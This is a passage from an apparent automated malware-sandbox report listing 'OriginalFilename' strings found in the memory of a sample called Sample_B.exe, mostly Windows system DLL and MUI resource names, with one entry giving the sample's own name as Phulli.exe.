                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameieinstal.exe.muiD vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmisvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRVSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedeskadp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePowerCPL.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsadp32.acm.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRV.SYS.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiccvid.drv.muiN vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebluetooth.cpl.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewpd_ci.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameINETRES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMFC42.DLL.MUIR vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSWPRV.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePhotoScreensaver.scr.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameATL.DLL.MUIR vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcbase.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelhdfrgui.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePDH.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSSCI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamescsiport.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVIFIL32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmci.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametermsrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBubblesj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIE4UINIT.EXE.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiedkcs32.dll.muiD vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWinMail.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewevtutil.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTBSSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameulib.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamei8042prt.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemycomput.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameparport.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedsound.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefwcfg.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameqwave.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameumrdp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewinsrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWinInit.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameservices.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelsasrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewship6.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshqos.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametzres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesppsvc.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameInput.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTipTsf.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSpTip.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTableTextService.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaero.msstyles.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskcomp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamespoolsv.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBFE.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskhost.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamej% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesnmptrap.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelmhsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedwm.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedhcpcore.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesstpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelocalspl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskeng.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWsdMon.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamevsstrace.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetprofm.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameesrb.dll.muiH vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamestobject.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerasdlg.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAltTab.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewscui.cpl.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametquery.dll.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameesent.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMsMpRes.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametwext.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamempr.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameschedsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFDResPub.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFunDisc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerpcrt4.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFDPrint.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameimageres.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSHTML.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskmgr.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewin32spl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameinetpp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameadvapi32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameprovsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamep2pcollab.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameQAgentRT.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameDhcpQEC.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlasvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenapinsp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepnrpnsp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFVEUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamews2_32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiphlpapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWebServices.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedhcpcsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepcwum.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefwpuclnt.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuserenv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametsgqec.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCertEnrollj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewebio.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameperftrack.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCDOSYS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedwmapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCertClij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecimwin32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegptext.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsobjs.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepnrpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameazrolesj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedrt.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNDIS.SYS.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePeerDistSvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWsmRes.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000000.2069282120.0000000000C42000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2075802327.0000000000464000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameehres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPSideShowGadgetj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameonex.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamethumbcache.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelocalsec.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUI0Detect.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWLANGPUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSV1_0.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamehotplug.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSTI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcss.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewuaueng.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLE32.DLL.MUIj% vs Sample_B.exe
